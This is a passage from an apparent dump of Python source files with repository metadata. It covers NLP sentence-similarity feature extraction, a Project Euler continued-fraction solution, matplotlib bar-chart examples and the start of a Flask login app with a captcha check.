score_common_hyp + hyp.min_depth()\r\n except:\r\n score_common_hyp = 
score_common_hyp\r\n \r\n if word==wordsen2:\r\n common_nouns+=1\r\n elif (word in wordsen2 or wordsen2 in word):\r\n common_nouns+=1 \r\n else:\r\n h=0\r\n if(len(wn.synsets(word,pos='n'))==0 or len(wn.synsets(wordsen2,pos='n'))==0):\r\n h=0.1\r\n else:\r\n tmp = getSimilarity(sim, word, wordsen2, NOUN, NOUN)\r\n if len(tmp)>0:\r\n h = tmp.max()\r\n if h>0.7:\r\n common_nouns+=1\r\n #Compare verbs from sentence 1 and 2\r\n for word1 in list_of_verbs_sen1:\r\n for word1sen2 in list_of_verbs_sen2:\r\n \r\n if HyperCommonDone != True:\r\n try:\r\n wordsyns = wn.synset(str(word1) + '.v.01')\r\n wordsens2syns = wn.synset(str(word1sen2) + '.v.01')\r\n common_hyper_2words = wordsyns.lowest_common_hypernyms(wordsens2syns)\r\n lstcm_hypernyms.extend(common_hyper_2words)\r\n for hyp in common_hyper_2words:\r\n score_common_hyp = score_common_hyp + hyp.min_depth()\r\n except:\r\n score_common_hyp = score_common_hyp\r\n \r\n if word1==word1sen2:\r\n common_verbs+=1 \r\n elif (word1 in word1sen2 or word1sen2 in word1):\r\n common_verbs+=1 \r\n else:\r\n h=0\r\n if(len(wn.synsets(word1,pos='v'))==0 or len(wn.synsets(word1sen2,pos='v'))==0):\r\n h=0.1\r\n else:\r\n tmp = getSimilarity(sim, word1, word1sen2, VERB, VERB)\r\n if len(tmp)>0:\r\n h = tmp.max()\r\n if h>0.2:\r\n common_verbs+=1\r\n \r\n if HyperCommonDone != True: \r\n if(score_common_hyp==0):\r\n comon_hyper_score.append(0)\r\n else:\r\n comon_hyper_score.append(score_common_hyp / len(set(lstcm_hypernyms)))\r\n total_nn=len(list_of_nouns_sen1)*len(list_of_nouns_sen2)\r\n total_vb=len(list_of_verbs_sen1)*len(list_of_verbs_sen2)\r\n \r\n if len(list_of_nouns_sen1)==0 and len(list_of_nouns_sen2)==0:\r\n Common_nouns_sen12.append(0)\r\n elif len(list_of_nouns_sen1)==0 or len(list_of_nouns_sen2)==0:\r\n Common_nouns_sen12.append(0)\r\n \r\n else:\r\n Common_nouns_sen12.append(((common_nouns*100)/total_nn))\r\n \r\n if len(list_of_verbs_sen1)==0 and len(list_of_verbs_sen2)==0:\r\n Common_verbs_sen12.append(0)\r\n elif len(list_of_verbs_sen1)==0 or len(list_of_verbs_sen2)==0:\r\n Common_verbs_sen12.append(0)\r\n \r\n else:\r\n Common_verbs_sen12.append(((common_verbs*100)/ total_vb))\r\n\r\n\r\n Common_nouns_sen12_new = []\r\n sumn = sum(Common_nouns_sen12)\r\n if(sumn!=0):\r\n for i in Common_nouns_sen12:\r\n Common_nouns_sen12_new.append((i*100)/sumn)\r\n else:\r\n Common_nouns_sen12_new = Common_nouns_sen12\r\n \r\n Common_verbs_sen12_new = []\r\n sumv = sum(Common_verbs_sen12)\r\n if(sumv!=0):\r\n for i in Common_verbs_sen12:\r\n Common_verbs_sen12_new.append((i*100)/sumv)\r\n else:\r\n Common_verbs_sen12_new = Common_verbs_sen12\r\n return Common_nouns_sen12_new, Common_verbs_sen12_new, comon_hyper_score\r\n \r\n\r\nsimilarities = [\"path_similarity\",\"lch_similarity\", \"wup_similarity\"]\r\n# , \"res_similarity\", \"jcn_similarity\", \"lin_similarity\"]\r\n\r\nfor sim in similarities:\r\n Common_nouns_sen12_new, Common_verbs_sen12_new, comon_hyper_score = getNormalizedCount(sim)\r\n df_features[\"Norm_NN_by\" + sim[0:3]] = Common_nouns_sen12_new\r\n df_features[\"Norm_VB_by\" + sim[0:3]] = Common_verbs_sen12_new\r\n if HyperCommonDone != True:\r\n df_features[\"Common_Hyper_Score\"] = comon_hyper_score\r\n HyperCommonDone = True\r\n\r\n\r\n\r\n\r\n\r\nprep={'of':1,'in':2,'to':3,'for':4,'with':5,'on':6,'at':7,'from':8,'by':9,'about':10,'as':11,'into':12,'like':13,'through':14,'after':15,'over':16,'between':17,'out':18,'against':19,'during':20,'without':21,'before':22,'under':23,'around':24,'among':25}\r\ndef Prep(df_features):\r\n 
List_common_prep=[]\r\n for index, row in df_features.iterrows():\r\n sen1_prep=[]\r\n sen2_prep=[]\r\n\r\n for i in row['Token_Sentence1']:\r\n if i in prep:\r\n sen1_prep.append(i)\r\n\r\n for j in row['Token_Sentence2']:\r\n if j in prep:\r\n sen2_prep.append(j)\r\n Common_prep=[]\r\n\r\n for k in sen1_prep:\r\n if k in sen2_prep:\r\n Common_prep.append(k)\r\n List_common_prep.append((len(Common_prep)/25)*100)\r\n return List_common_prep\r\n \r\n \r\n\r\n \r\n\r\ndf_features['Common_prepositions']= Prep(df_features)\r\n\r\n\r\n\r\n\r\n\r\n\r\nprint(\"Before Dependency Parser operations\")\r\n#nlp = StanfordCoreNLP('http://localhost:9000')\r\n#\r\n#from nltk.parse.stanford import StanfordDependencyParser\r\n##path_to_jar = 'C://Users//gagan//OneDrive//Desktop//NLPProject//stanford-parser-full-2018-10-17//stanford-parser.jar'\r\n##path_to_models_jar = 'C://Users//gagan//OneDrive//Desktop//NLPProject//stanford-parser-full-2018-10-17//stanford-parser-3.9.2-models.jar'\r\n#path_to_jar = 'C://Users//maitr//OneDrive//Desktop//Project_Final//stanford-parser-full-2018-10-17//stanford-parser.jar'\r\n#path_to_models_jar = 'C://Users//maitr//OneDrive//Desktop//Project_Final//stanford-parser-full-2018-10-17//stanford-parser-3.9.2-models.jar'\r\n#\r\n\r\n#dependency_parser = StanfordDependencyParser(path_to_jar=path_to_jar, path_to_models_jar=path_to_models_jar)\r\n\r\n\r\nlemmatizer = WordNetLemmatizer()\r\nverb = ['VB','VBD','VBG','VBN','VBP','VBZ']\r\nnoun = ['NN','NNS','NNP','NNPS']\r\nnounverb = ['VB','VBD','VBG','VBN','VBP','VBZ','NN','NNS','NNP','NNPS']\r\nothertags = ['LS', 'TO', 'WP', 'UH', 'JJ', '--', 'DT', 'PRP', ':',\r\n 'WP$','PRP$', 'WDT', '(', ')', '.', ',', '``', '$',\r\n 'RB', 'RBR', 'RBS', 'IN', 'FW', 'RP', 'JJR', 'JJS', 'PDT', 'MD', 'WRB',\r\n 'EX', 'SYM', 'CC', 'CD', 'POS']\r\ndef returnCategory(tag):\r\n if(tag in noun):\r\n return NOUN\r\n if(tag in verb):\r\n return VERB\r\n else:\r\n return NOUN\r\n\r\n\r\nimport networkx as nx\r\n\r\n \r\n \r\n\r\nnlp = spacy.load('en')\r\n \r\ndef getDependencyPairSim(sim):\r\n edgePathDepWtSum = []\r\n alledgePathDepWtSum = []\r\n tagDepWtSum = []\r\n setTagDepWtSum = []\r\n setOvefitEdgePathDepWtSum = []\r\n for index,row in df_features.iterrows():\r\n \r\n tagrelations1 = []\r\n wordrelations1 = []\r\n allwordrelations1 = []\r\n \r\n doc1 = nlp(row['Sentence1'])\r\n root1=[]\r\n \r\n # record all possible edges\r\n for token in doc1:\r\n tagrelations1.append((token.head.tag_, token.tag_))\r\n if(token.head.text == token.text):\r\n root1.append((lemmatizer.lemmatize(token.text,penn_to_wn(token.tag_,True)), token.tag_))\r\n else:\r\n allwordrelations1.append(((lemmatizer.lemmatize(token.head.text,penn_to_wn(token.head.tag_,True)),token.head.tag_), (lemmatizer.lemmatize(token.text,penn_to_wn(token.tag_,True)),token.tag_)))\r\n if(nounverb.__contains__(token.tag_) and nounverb.__contains__(token.head.tag_)):\r\n# print(lemmatizer.lemmatize(token.head.text,penn_to_wn(token.head.tag_,True)),token.head.tag_, lemmatizer.lemmatize(token.text,penn_to_wn(token.tag_,True)), token.tag_)\r\n wordrelations1.append((lemmatizer.lemmatize(token.head.text,penn_to_wn(token.head.tag_,True)), lemmatizer.lemmatize(token.text,penn_to_wn(token.tag_,True))))\r\n \r\n\r\n \r\n G = nx.DiGraph()\r\n G.add_edges_from(allwordrelations1)\r\n \r\n paths1=[]\r\n for node in G:\r\n if G.out_degree(node)==0: #it's a leaf\r\n for root in root1:\r\n try:\r\n paths1.append(nx.shortest_path(G, root, node))\r\n break\r\n except:\r\n continue\r\n \r\n \r\n 
allpathrelations1=[]\r\n #get all possible one edge paths invololving N and V and store it\r\n for eachpath in paths1:\r\n for i in range(len(eachpath)):\r\n for j in range(i+1,len(eachpath)):\r\n if(nounverb.__contains__(eachpath[i][1]) and nounverb.__contains__(eachpath[j][1])):\r\n allpathrelations1.append((eachpath[i][0],eachpath[j][0]))\r\n \r\n # print(set(allpathrelations1))\r\n tagrelations2 = []\r\n wordrelations2 = []\r\n allwordrelations2 = []\r\n \r\n pathSimWt = []\r\n \r\n root2 = []\r\n doc2 = nlp(row['Sentence2'])\r\n # record all possible edges\r\n for token in doc2:\r\n if(token.head.text == token.text):\r\n root2.append((lemmatizer.lemmatize(token.text,penn_to_wn(token.tag_,True)), token.tag_))\r\n else:\r\n allwordrelations2.append(((lemmatizer.lemmatize(token.head.text,penn_to_wn(token.head.tag_,True)),token.head.tag_), (lemmatizer.lemmatize(token.text,penn_to_wn(token.tag_,True)),token.tag_)))\r\n tagrelations2.append((token.head.tag_, token.tag_))\r\n if(nounverb.__contains__(token.tag_) and nounverb.__contains__(token.head.tag_)):\r\n wordrelations2.append((lemmatizer.lemmatize(token.head.text,penn_to_wn(token.head.tag_,True)), lemmatizer.lemmatize(token.text,penn_to_wn(token.tag_,True))))\r\n \r\n # print(tagrelations2)\r\n G = nx.DiGraph()\r\n G.add_edges_from(allwordrelations2)\r\n paths2=[]\r\n # get all root to tail paths\r\n for node in G:\r\n if G.out_degree(node)==0: #it's a leaf\r\n for root in root2:\r\n try:\r\n paths2.append(nx.shortest_path(G, root, node))\r\n break\r\n except:\r\n continue\r\n # print(paths2)\r\n #get all possible one edge paths invololving N and V and store it\r\n allpathrelations2=[]\r\n for eachpath in paths2:\r\n for i in range(len(eachpath)):\r\n for j in range(i+1,len(eachpath)):\r\n if(nounverb.__contains__(eachpath[i][1]) and nounverb.__contains__(eachpath[j][1])):\r\n allpathrelations2.append((eachpath[i][0],eachpath[j][0]))\r\n \r\n # print(set(allpathrelations2)) \r\n if len(wordrelations2+wordrelations1)!=0:\r\n setOvefitEdgePathDepWtSum.append(len(tuple(set(wordrelations2).intersection(set(wordrelations1)))) / len(set(wordrelations2+wordrelations1)))\r\n else:\r\n setOvefitEdgePathDepWtSum.append(0.8)\r\n setTagDepWtSum.append(len(tuple(set(tagrelations1).intersection(set(tagrelations2)))) / len(set(tagrelations2+tagrelations1)))\r\n \r\n \r\n #pass tags also\r\n #smaller on outer\r\n new_wordrelations1 = wordrelations1\r\n new_wordrelations2 = wordrelations2\r\n swapped=False\r\n if(len(set(wordrelations1)) > len(set(wordrelations2))):\r\n swapped=True\r\n new_wordrelations1 = wordrelations2\r\n new_wordrelations2 = wordrelations1\r\n pathSimWt=0\r\n for wr1 in set(new_wordrelations1): \r\n maxh=0;\r\n maxd=0;\r\n for wr2 in new_wordrelations2:\r\n h=0\r\n d=0\r\n if(wr1[0]==wr2[0]):\r\n maxh = 1\r\n else:\r\n if(swapped):\r\n# print(wr1[0], wr2[0] , df_features[\"Token_LemaPOS_Sent_2\"][index][wr1[0]],df_features[\"Token_LemaPOS_Sent_1\"][index][wr2[0]])\r\n tmp = getSimilarity(sim, wr1[0], wr2[0], returnCategory(df_features[\"Token_LemaPOS_Sent_2\"][index][wr1[0]]), returnCategory(df_features[\"Token_LemaPOS_Sent_1\"][index][wr2[0]]))\r\n else:\r\n# print(wr2[0], wr1[0] , df_features[\"Token_LemaPOS_Sent_2\"][index][wr2[0]],df_features[\"Token_LemaPOS_Sent_1\"][index][wr1[0]])\r\n tmp = getSimilarity(sim, wr1[0], wr2[0], returnCategory(df_features[\"Token_LemaPOS_Sent_1\"][index][wr1[0]]), returnCategory(df_features[\"Token_LemaPOS_Sent_2\"][index][wr2[0]]))\r\n if len(tmp)>0:\r\n h = tmp.max()\r\n else:\r\n h = 0.1\r\n 
if(wr1[1]==wr2[1]):\r\n                    maxd = 1\r\n                else:\r\n                    if(swapped):\r\n#                        print(wr1[1], df_features[\"PosTagLema_Sentence2\"][index][wr1[1]], wr2[1], df_features[\"PosTagLema_Sentence1\"][index][wr2[1]])\r\n                        tmp = getSimilarity(sim, wr1[1], wr2[1], returnCategory(df_features[\"Token_LemaPOS_Sent_2\"][index][wr1[1]]), returnCategory(df_features[\"Token_LemaPOS_Sent_1\"][index][wr2[1]]))\r\n                    else:\r\n#                        print(wr1[1], df_features[\"PosTagLema_Sentence1\"][index][wr1[1]], wr2[1], df_features[\"PosTagLema_Sentence2\"][index][wr2[1]])\r\n#                        print(wr1[1] , wr2[1])\r\n                        tmp = getSimilarity(sim, wr1[1], wr2[1], returnCategory(df_features[\"Token_LemaPOS_Sent_1\"][index][wr1[1]]), returnCategory(df_features[\"Token_LemaPOS_Sent_2\"][index][wr2[1]]))\r\n                    if len(tmp)>0:\r\n                        d = tmp.max()\r\n                    else:\r\n                        d = 0.1\r\n                # keep the best head/dependent similarity seen so far\r\n                if(h and maxh<h):\r\n                    maxh = h\r\n                if(d and maxd<d):\r\n                    maxd = d\r\n            if(maxh>0.2 and maxd>0.1):\r\n                pathSimWt = pathSimWt + (maxh+maxd)/2;\r\n            else:\r\n                pathSimWt = 0.1 + pathSimWt;\r\n        if len(new_wordrelations1)!=0: \r\n            edgePathDepWtSum.append(pathSimWt/len(set(new_wordrelations1)))\r\n        else:\r\n            edgePathDepWtSum.append(0.5)\r\n        \r\n        \r\n        new_allpathrelations1 = allpathrelations1\r\n        new_allpathrelations2 = allpathrelations2\r\n        \r\n        swapped = False\r\n        if(len(set(allpathrelations1)) > len(set(allpathrelations2))):\r\n            swapped = True\r\n            new_allpathrelations1 = allpathrelations2\r\n            new_allpathrelations2 = allpathrelations1\r\n        pathSimWt=0\r\n        for wr1 in set(new_allpathrelations1): \r\n            maxh=0;\r\n            maxd=0;\r\n            for wr2 in set(new_allpathrelations2):\r\n                h=0\r\n                d=0\r\n                if(wr1[0]==wr2[0]):\r\n                    maxh = 1\r\n                else:\r\n                    if(swapped):\r\n                        tmp = getSimilarity(sim, wr1[0], wr2[0], returnCategory(df_features[\"Token_LemaPOS_Sent_2\"][index][wr1[0]]), returnCategory(df_features[\"Token_LemaPOS_Sent_1\"][index][wr2[0]]))\r\n                    else:\r\n                        tmp = getSimilarity(sim, wr1[0], wr2[0], returnCategory(df_features[\"Token_LemaPOS_Sent_1\"][index][wr1[0]]), returnCategory(df_features[\"Token_LemaPOS_Sent_2\"][index][wr2[0]]))\r\n                    if len(tmp)>0:\r\n                        h = tmp.max()\r\n                    else:\r\n                        h = 0\r\n                if(wr1[1]==wr2[1]):\r\n                    maxd = 1\r\n                else:\r\n                    if(swapped):\r\n                        tmp = getSimilarity(sim, wr1[1], wr2[1], returnCategory(df_features[\"Token_LemaPOS_Sent_2\"][index][wr1[1]]), returnCategory(df_features[\"Token_LemaPOS_Sent_1\"][index][wr2[1]]))\r\n                    else:\r\n                        tmp = getSimilarity(sim, wr1[1], wr2[1], returnCategory(df_features[\"Token_LemaPOS_Sent_1\"][index][wr1[1]]), returnCategory(df_features[\"Token_LemaPOS_Sent_2\"][index][wr2[1]]))\r\n                    if len(tmp)>0:\r\n                        d = tmp.max()\r\n                    else:\r\n                        d = 0\r\n                # keep the best head/dependent similarity seen so far\r\n                if(h and maxh<h):\r\n                    maxh = h\r\n                if(d and maxd<d):\r\n                    maxd = d\r\n            if(maxh>0.2 and maxd>0.1):\r\n                pathSimWt = pathSimWt + (maxh+maxd)/2;\r\n            else:\r\n                pathSimWt = 0.1 + pathSimWt;\r\n        if len(new_allpathrelations1)!=0:\r\n            alledgePathDepWtSum.append(pathSimWt/len(set(new_allpathrelations1)))\r\n        else:\r\n            alledgePathDepWtSum.append(0.5)\r\n        \r\n        t=0\r\n        new_tagrelations1 = tagrelations1\r\n        new_tagrelations2 = tagrelations2\r\n        if(len(tagrelations1) > len(tagrelations2)):\r\n            new_tagrelations1 = tagrelations2\r\n            new_tagrelations2 = tagrelations1\r\n        for tr1 in set(new_tagrelations1):\r\n            for tr2 in set(new_tagrelations2):\r\n                if(tr1[0]==tr2[0] and tr1[1]==tr2[1]):\r\n                    t=t+1\r\n                    break\r\n        tagDepWtSum.append(t/(len(new_tagrelations1)));\r\n    return alledgePathDepWtSum, edgePathDepWtSum, tagDepWtSum, setTagDepWtSum, setOvefitEdgePathDepWtSum\r\n    \r\n\r\nfor sim in similarities:\r\n    alledgePathDepWtSum, edgePathDepWtSum, tagDepWtSum, setTagDepWtSum, setOvefitEdgePathDepWtSum = getDependencyPairSim(sim)\r\n    df_features['ALl_EdgePath_Dep_Wt_by_' + sim[0:3]] = alledgePathDepWtSum\r\n    df_features['EdgePath_Dep_Wt_by_' + sim[0:3]] = edgePathDepWtSum\r\n    df_features['Tag_Dep_Wt_by_' + sim[0:3]] = tagDepWtSum\r\n    df_features['Set_Tag_Dep_Wt_by_' + sim[0:3]] = setTagDepWtSum\r\n    df_features['Set_Ovefit_EdgePath_Dep_Wt_by_' + sim[0:3]] = setOvefitEdgePathDepWtSum\r\n    \r\n\r\n# storing features in txt 
file\r\ndf_features.to_csv('df_features_traint.txt',sep='\\t',index=None)\r\n#\r\n##Split data into training and test sets\r\n#\r\n#\r\n#df_model_f=df_features.copy()\r\n#df_model_f.dropna(axis=0, how='any', thresh=None, subset=None, inplace=True)\r\n#df_model_f=df_model_f.drop(['id', 'Sentence1', 'Sentence2','Token_Sentence1',\r\n# 'Token_Sentence2', 'Common_tokens', 'PosTag_Sentence1',\r\n# 'PosTag_Sentence2', 'Lema_Sentence1', 'Lema_Sentence2',\r\n# 'PosTagLema_Sentence1', 'PosTagLema_Sentence2'],axis=1)\r\n##list_features=np.array([list(df_model_f['Normalized_NN']),\r\n## list(df_model_f['Normalized_VB']),\r\n## list(df_model_f['EdgePath_Dep_Wt']),\r\n## list(df_model_f['Tag_Dep_Wt'])])\r\n#list_features=np.array([\r\n# \r\n# list(df_model_f['Norm_NN_bypat']),\r\n# list(df_model_f['Norm_VB_bypat']),\r\n# list(df_model_f['Norm_NN_bylch']),\r\n# list(df_model_f['Norm_VB_bylch']),\r\n# list(df_model_f['Norm_NN_bywup']),\r\n# list(df_model_f['Norm_VB_bywup']),\r\n# list(df_model_f['Common_prepositions']),\r\n# \r\n# list(df_model_f['ALl_EdgePath_Dep_Wt_by_pat']),\r\n# list(df_model_f['EdgePath_Dep_Wt_by_pat']),\r\n# list(df_model_f['Tag_Dep_Wt_by_pat']),\r\n# list(df_model_f['Set_Tag_Dep_Wt_by_pat']),\r\n# list(df_model_f['Set_Ovefit_EdgePath_Dep_Wt_by_pat']),\r\n# \r\n# list(df_model_f['ALl_EdgePath_Dep_Wt_by_wup']),\r\n# list(df_model_f['EdgePath_Dep_Wt_by_wup']),\r\n# list(df_model_f['Tag_Dep_Wt_by_wup']),\r\n# list(df_model_f['Set_Tag_Dep_Wt_by_wup']),\r\n# list(df_model_f['Set_Ovefit_EdgePath_Dep_Wt_by_wup']),\r\n# \r\n# list(df_model_f['ALl_EdgePath_Dep_Wt_by_lch']),\r\n# list(df_model_f['EdgePath_Dep_Wt_by_lch']),\r\n# list(df_model_f['Tag_Dep_Wt_by_lch']),\r\n# list(df_model_f['Set_Tag_Dep_Wt_by_lch']),\r\n# list(df_model_f['Set_Ovefit_EdgePath_Dep_Wt_by_lch']),\r\n# \r\n# \r\n# ])\r\n#list_features=np.transpose(list_features)\r\n#X = list_features\r\n#ylabels = list(df_model_f['Gold Tag'])\r\n#\r\n##\r\n##def Majority_vote(X,ylabels):\r\n## import pickle\r\n## from sklearn.model_selection import train_test_split\r\n## X_train, X_test, y_train, y_test = train_test_split(X, ylabels, test_size=0.2,random_state=500,shuffle=False)\r\n## \r\n## ###Model_Building\r\n## #from sklearn import svm\r\n## from sklearn.ensemble import RandomForestClassifier\r\n## #from sklearn.linear_model import LinearRegression\r\n## from sklearn.linear_model import LogisticRegression\r\n## #\r\n## classifier=LogisticRegression(random_state=0, solver='lbfgs',multi_class='multinomial').fit(X_train, y_train)\r\n## classifier=classifier.fit(X_train,y_train)\r\n## \r\n## #save model\r\n## pkl_filename = \"Logistic_Regression.pkl\"\r\n## with open(pkl_filename, 'wb') as file:\r\n## pickle.dump(classifier, file)\r\n### c=classifier.predict(X_test)\r\n## \r\n## \r\n## classifier1 = RandomForestClassifier(n_estimators=100, max_depth=2,random_state=0)\r\n## classifier1=classifier1.fit(X_train,y_train)\r\n## \r\n## #Save Model\r\n## pkl_filename1 = \"Random_ForestClassifier.pkl\"\r\n## with open(pkl_filename1, 'wb') as file:\r\n## pickle.dump(classifier1, file)\r\n## \r\n### c1=classifier1.predict(X_test)\r\n## \r\n## \r\n### from sklearn.svm import SVC\r\n### classifier2 = SVC(kernel = 'linear', C = 1).fit(X_train, y_train)\r\n### c2 = classifier2.predict(X_test)\r\n## \r\n## from sklearn.naive_bayes import MultinomialNB\r\n## classifier3 = MultinomialNB()\r\n## classifier3=classifier3.fit(X, ylabels)\r\n## \r\n## #Save Model\r\n## pkl_filename2 = \"MultinomialNB.pkl\"\r\n## with open(pkl_filename2, 'wb') as 
file:\r\n##        pickle.dump(classifier3, file)\r\n##\r\n##    #Load models\r\n##    with open(pkl_filename, 'rb') as file:\r\n##        pickle_model = pickle.load(file)\r\n##    c=pickle_model.predict(X_test)\r\n##    with open(pkl_filename1, 'rb') as file:\r\n##        pickle_model1 = pickle.load(file)\r\n##    c1=pickle_model1.predict(X_test)\r\n##    with open(pkl_filename2, 'rb') as file:\r\n##        pickle_model2 = pickle.load(file)\r\n##    c2=pickle_model2.predict(X_test)\r\n##\r\n##    \r\n##    \r\n##    mvotedlabel=[]\r\n##    for ind in range(len(c)):\r\n##        if c[ind]==c1[ind] and c[ind]==c2[ind]:\r\n##            mvotedlabel.append(c[ind])\r\n##        elif c[ind]==c1[ind] and c[ind]!=c2[ind]:\r\n##            mvotedlabel.append(c[ind])  \r\n##        elif c1[ind]==c2[ind] and c[ind]!=c1[ind]:\r\n##            mvotedlabel.append(c1[ind])\r\n##        elif c[ind]==c2[ind] and c[ind]!=c1[ind]:\r\n##            mvotedlabel.append(c[ind])\r\n##        else:\r\n##            #Random Forest\r\n##            mvotedlabel.append(c1[ind])\r\n##    \r\n##    from sklearn import metrics\r\n##    accuracy=metrics.accuracy_score(y_test, c)\r\n##    accuracy1=metrics.accuracy_score(y_test, c1)\r\n##    accuracy2=metrics.accuracy_score(y_test, c2)\r\n##    \r\n##    print(accuracy,accuracy1,accuracy2)\r\n##    \r\n##    accuracy3=metrics.accuracy_score(y_test, mvotedlabel)\r\n##    print(\"Majority Vote\",accuracy3)\r\n##\r\n##\r\n##Accuracy_mvoted=Majority_vote(X,ylabels)\r\n","repo_name":"pygaganthon/Sentence-Similarity","sub_path":"mainTrainFile.py","file_name":"mainTrainFile.py","file_ext":"py","file_size_in_byte":38682,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"46271157674","text":"def main():\n\tterms = []\n\tfor i in range(100):\n\t\tif i == 0: terms.append(2)\n\t\telif (i+1)%3 == 0: terms.append(((i+1)//3)*2)\n\t\telse: terms.append(1)\n\tnumerador = terms[-1]\n\tdenominador = 1\n\tfor i in reversed(terms[:-1]):\n\t\t# Switch\n\t\ttemp = numerador\n\t\tnumerador = denominador\n\t\tdenominador = temp\n\n\t\tnumerador += denominador * i\n\t#print(str(numerador) + \"/\" + str(denominador))\n\tsum = 0\n\twhile (numerador) :\n\t\tsum += numerador % 10\n\t\tnumerador = numerador // 10\n\tprint(\"If you can trust me, the number you are looking for is \" + str(sum))\n\nmain()\n\n","repo_name":"PysKa-Ratzinger/personal_project_euler_solutions","sub_path":"solutions/051-075/65/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"19667404739","text":"# ---\n# jupyter:\n#   jupytext:\n#     formats: ipynb,py\n#     text_representation:\n#       extension: .py\n#       format_name: light\n#       format_version: '1.5'\n#     jupytext_version: 1.12.0\n#   kernelspec:\n#     display_name: Python 3.9.2 64-bit\n#     name: python3\n# ---\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nplt.style.use(\"fivethirtyeight\")\n\n# +\nages_x = [25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35]\nx_indexes = np.arange(len(ages_x))\nwd = 0.25\n\ndev_y = [38496, 42000, 46752, 49320, 53200, 56000, 62316, 64928, 67317, 68748, 73752]\nplt.bar(x_indexes - wd, dev_y, width=wd, color=\"#444444\", label=\"All Devs\")\n\npy_dev_y = [45372, 48876, 53850, 57287, 63016, 65998, 70003, 70000, 71496, 75370, 83640]\nplt.bar(x_indexes, py_dev_y, width=wd, color=\"#008fd5\", label=\"Python\")\n\njs_dev_y = [37810, 43515, 46823, 49293, 53437, 56373, 62375, 66674, 68745, 68746, 74583]\nplt.bar(x_indexes + wd, js_dev_y, width=wd, color=\"#e5ae38\", label=\"JavaScript\")\n\nplt.legend()\nplt.xticks(ticks=x_indexes, labels=ages_x)\nplt.title(\"Median 
Salary (USD) by Age\")\nplt.xlabel(\"Ages\")\nplt.ylabel(\"Median Salary (USD)\")\n\n# plt.tight_layout()\n\nplt.show()\n\n# +\n# import csv\nimport pandas as pd\nfrom collections import Counter\n\n# with open('./data.csv') as csvFile:\n#     csvReader = csv.DictReader(csvFile)\n\ndata = pd.read_csv(\"./data.csv\")\nids = data[\"Responder_id\"]\nlang_responses = data[\"LanguagesWorkedWith\"]\n\nlanguageCounter = Counter()\n\nfor response in lang_responses:\n    languageCounter.update(response.split(\";\"))\n\nlanguages = []\npopularity = []\n\nfor item in languageCounter.most_common(15):\n    languages.append(item[0])\n    popularity.append(item[1])\n\n\nlanguages.reverse()\npopularity.reverse()\n\n# plt.bar(languages, popularity)\nplt.barh(languages, popularity)\n\nplt.title(\"Most Popular Languages\")\n# plt.xlabel('Programming Languages')\nplt.xlabel(\"Number of People Who Use\")\n\nplt.grid(False)\nplt.tight_layout()\nplt.show()\n","repo_name":"huibosa/programming","sub_path":"machine-learning/data-analysis/tutorial/matplotlib/demo/bar_chart.py","file_name":"bar_chart.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"73861412125","text":"import os\n\nfrom flask import (Flask, url_for, render_template, request,\n                   session, redirect, make_response)\nfrom sqlalchemy.orm import sessionmaker\n\nfrom db.users import Users, engine\nfrom utils.verify_code import CaptchaTool\n\napp = Flask(__name__, template_folder='../templates')\napp.secret_key = os.urandom(16)\n\n\n@app.route(\"/\")\ndef index():\n    \"\"\"Home page.\"\"\"\n    return render_template('login.html')\n\n\n@app.route('/login', methods=['POST'])\ndef login():\n    \"\"\"Log in.\"\"\"\n    # Get the username, password and captcha code\n    username = request.form.get(\"username\")\n    pwd = request.form.get('pwd', None)\n    code = request.form.get('code', None)\n    # Check that none of the fields are empty. The front end usually does this\n    # kind of check and validates the data format, but the back end must still\n    # validate important data to guard against malicious input\n    if not (username and pwd and code):\n        return redirect(url_for('error_page',\n                                message='username, password or code cannot be none'))\n    \"\"\"\n    Check the captcha first and reject the request if it is wrong\n    (cheapest check first: fewer database hits, less database load,\n    and no wasted resources).\n    The normal flow would be: after the user enters the username, password\n    or captcha, send an asynchronous request (ajax, axios, etc.) to check\n    whether the user exists and partially refresh the page with a hint if\n    not, instead of redirecting straight to an error page as done here,\n    which makes for a very poor user experience.\n    \"\"\"\n    if code == session['code']:\n        try:\n            Session = sessionmaker(bind=engine)\n            session_db = Session()\n            user = session_db.query(Users.username, Users.pwd)\\\n                .filter(Users.username == username, Users.pwd == pwd)\\\n                .first()\n        except Exception:\n            # Exceptions like this should normally go to a global exception\n            # handler and be caught at a fine granularity, then redirect to a\n            # suitable hint page to improve the user experience\n            return redirect(url_for('error_page', message='unknown error occurred'))\n\n        # If the user exists in the table, store the user info in the session\n        if user:\n            session['username'] = username\n            session['user'] = user\n            # Flask requires every branch to return a value; could be optimized\n            return redirect(url_for('go_main', username=username))\n        return redirect(url_for('error_page', message='no user'))\n    return redirect(url_for('error_page', message='wrong code'))\n\n\n@app.route('/main', methods=['GET'])\ndef go_main():\n    \"\"\"Main page.\"\"\"\n    # If the session has no 'user' attribute, the client is not logged in,\n    # so send them back to the login page\n    if not session.get('user', None):\n        return render_template('login.html')\n    return render_template('main.html', username=session['username'])\n\n\n@app.route('/logout', methods=['GET', 'POST'])\ndef logout():\n    \"\"\"Log out.\"\"\"\n    if session.get('username') is not None:\n        session.clear()\n        return redirect(url_for('index'))\n    return render_template('error.html', message='please login first!')\n\n\n@app.route('/errorPage/<message>', methods=['GET', 'POST'])\ndef error_page(message):\n    
